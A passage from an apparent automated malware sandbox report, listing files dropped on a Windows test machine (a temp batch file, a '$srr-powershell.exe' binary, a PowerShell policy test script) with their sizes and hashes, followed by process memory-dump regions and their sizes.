                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            0d9b5c2897b570a97a9b4387a3795bb8a7ceaec03c293819c31f4922ed81472c4861152da1df6cd8ec68229cd80476dbc303f7fc5f24ddeb943b4d4ef96f70d4

                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ritNxtEkOTZf.bat
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            206B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            56b14657a5aa4203a738609f1d5e6c08

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            ebf39843183738292ed7d327506e896da59ff50f

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            e1d38609dab269da82b1eba5275ffbf0ef9c099d6982d7ea41c8127816dcb36e

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            02a6ffb6ce317f9a8863cdb0d7ed75a3dfce58cb4d50142e1241d3578a1b13c84d93a50b2824ab453122f863dedd6bc824efecf030f5a8a6e3f50fdaacf46ed0

                                                                                                                                                                                                          • C:\Windows\SysWOW64\Windows\$srr-powershell.exe
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            409KB

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            a4a9308ce3b465b6b2dccb94b86d8a83

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            7e594db5d7adbffa0ca6cadad7a8b037156d90cc

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            98bbe270ca87c08856cc3dceafef76824baa96fe031d7f00f0517b2fd898e117

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            393af569d8d3cbe2a12fe0c938ccd15ff2247cd1e916de71b8567cb0beb7aa93991735baf9e00db657fa626e797a70699f290a96405a8abf03c3bb24e25f977b

                                                                                                                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_v2itpep2.3cb.ps1
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            60B

                                                                                                                                                                                                            MD5

                                                                                                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                          • memory/212-1658-0x0000000000DB0000-0x0000000000E1C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/316-94-0x000001D3EB570000-0x000001D3EB59B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/316-95-0x00007FFF28C30000-0x00007FFF28C40000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/316-88-0x000001D3EB570000-0x000001D3EB59B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/388-99-0x0000021C8F960000-0x0000021C8F98B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/612-53-0x00000258B9180000-0x00000258B91A5000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            148KB

                                                                                                                                                                                                          • memory/612-55-0x00000258B91B0000-0x00000258B91DB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/612-54-0x00000258B91B0000-0x00000258B91DB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/612-61-0x00000258B91B0000-0x00000258B91DB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/612-62-0x00007FFF28C30000-0x00007FFF28C40000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/660-66-0x000002E5613D0000-0x000002E5613FB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/660-73-0x00007FFF28C30000-0x00007FFF28C40000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/660-72-0x000002E5613D0000-0x000002E5613FB000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/952-83-0x000001B48BF30000-0x000001B48BF5B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/952-84-0x00007FFF28C30000-0x00007FFF28C40000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            64KB

                                                                                                                                                                                                          • memory/952-77-0x000001B48BF30000-0x000001B48BF5B000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            172KB

                                                                                                                                                                                                          • memory/972-1227-0x0000000000080000-0x00000000000EC000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/1964-37-0x00007FFF68BB0000-0x00007FFF68DA5000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                          • memory/1964-30-0x00000247FB0A0000-0x00000247FB0C2000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            136KB

                                                                                                                                                                                                          • memory/1964-36-0x00000247FB3D0000-0x00000247FB3FA000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            168KB

                                                                                                                                                                                                          • memory/1964-38-0x00007FFF68160000-0x00007FFF6821E000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            760KB

                                                                                                                                                                                                          • memory/2012-756-0x0000000000800000-0x000000000086C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/2468-1335-0x0000000000690000-0x00000000006FC000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/2556-1871-0x0000000000280000-0x00000000002EC000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/2816-6-0x0000000006780000-0x0000000006792000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            72KB

                                                                                                                                                                                                          • memory/2816-5-0x0000000005A70000-0x0000000005AD6000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            408KB

                                                                                                                                                                                                          • memory/2816-4-0x0000000074BE0000-0x0000000075390000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            7.7MB

                                                                                                                                                                                                          • memory/2816-2-0x0000000005E70000-0x0000000006414000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                          • memory/2816-3-0x0000000005960000-0x00000000059F2000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            584KB

                                                                                                                                                                                                          • memory/2816-7-0x0000000006CC0000-0x0000000006CFC000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            240KB

                                                                                                                                                                                                          • memory/2816-1-0x0000000000EE0000-0x0000000000F4C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/2816-20-0x0000000074BE0000-0x0000000075390000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            7.7MB

                                                                                                                                                                                                          • memory/2816-0-0x0000000074BEE000-0x0000000074BEF000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            4KB

                                                                                                                                                                                                          • memory/3212-986-0x0000000000C20000-0x0000000000C8C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/3300-1102-0x00000000000B0000-0x000000000011C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/3344-1579-0x0000000000AC0000-0x0000000000B2C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/3568-860-0x0000000000500000-0x000000000056C000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            432KB

                                                                                                                                                                                                          • memory/3876-42-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3876-49-0x00007FFF68160000-0x00007FFF6821E000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            760KB

                                                                                                                                                                                                          • memory/3876-43-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3876-48-0x00007FFF68BB0000-0x00007FFF68DA5000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            2.0MB

                                                                                                                                                                                                          • memory/3876-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3876-40-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3876-50-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/3876-47-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            32KB

                                                                                                                                                                                                          • memory/4788-13-0x0000000074BE0000-0x0000000075390000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            7.7MB

                                                                                                                                                                                                          • memory/4788-14-0x0000000074BE0000-0x0000000075390000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            7.7MB

                                                                                                                                                                                                          • memory/4788-35-0x0000000074BE0000-0x0000000075390000-memory.dmp
                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                            7.7MB